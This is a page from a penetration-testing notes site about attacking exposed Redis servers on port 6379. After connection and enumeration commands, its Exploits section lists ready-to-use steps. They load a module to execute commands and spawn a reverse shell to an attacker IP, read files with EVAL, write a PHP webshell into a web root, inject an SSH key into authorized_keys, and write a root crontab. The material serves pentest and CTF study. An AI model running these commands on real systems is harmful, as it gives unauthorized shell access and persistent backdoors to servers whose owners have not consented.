📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Commands
  • Check connection
  • Login
  • Enumeration
  • Exploits
  • Run code with ExecuteCommand module
  • Read file
  • Webshell in site root
  • SSH key injection
  • Crontab edit
  1. Networking
  2. Ports

6379 - Redis

Commands

Check connection

HELLO
PING
TIME

Login

with nc

nc -nv <ip> <port>
info    #check if authentication is required
auth <user> <pass>

with redis-cli

apt-get install redis-tools
redis-cli -h <ip> -p <port>    #no password
redis-cli -h <ip> -p <port> -a <pass>

Enumeration

info
client list
config GET *
config GET dir
SELECT <db number>    #see output of INFO command for database numbers
KEYS *
GET <key> 

Exploits

Run code with ExecuteCommand module

Requires access to writable folders on target's machine

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make
copy ./src/module.so to the remote machine
nc -ncv <ip> <port>
MODULE LOAD <remote path>/module.so

Execute commands

after connecting to Redis with nc or redis-cli and loading the module

system.exec "<command>"
system.rev <ip> <port>    #spawn a reverse shell

Read file

EVAL dofile('<file>') 0

Webshell in site root

config set dir <webapp root>
config set dbfilename rv.php
set test "<?php echo shell_exec($_GET['cmd']);?>"    #usage: /rv.php?cmd=<command>
save

SSH key injection

ssh-keygen -t rsa    #save the keys in the current folder
(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > key.txt
cat key.txt | redis-cli -h <ip> -p <port> -x set crackit
redis-cli -h <ip> -p <port>
config set dir /home/<user>/.ssh/
config set dbfilename "authorized_keys"
save
exit
ssh <user>@<ip> -i ./id_rsa

Crontab edit

echo -e "\n\n*/1 * * * * <command>\n\n"|redis-cli -h 10.85.0.52 -x set 1
redis-cli -h <ip> -p <port>
config set dir /var/spool/cron/crontabs/    #for CentOS the dir is /var/spool/cron/
config set dbfilename root
save
Previous873 - RsyncNext6667 - IRC

Last updated 2 years ago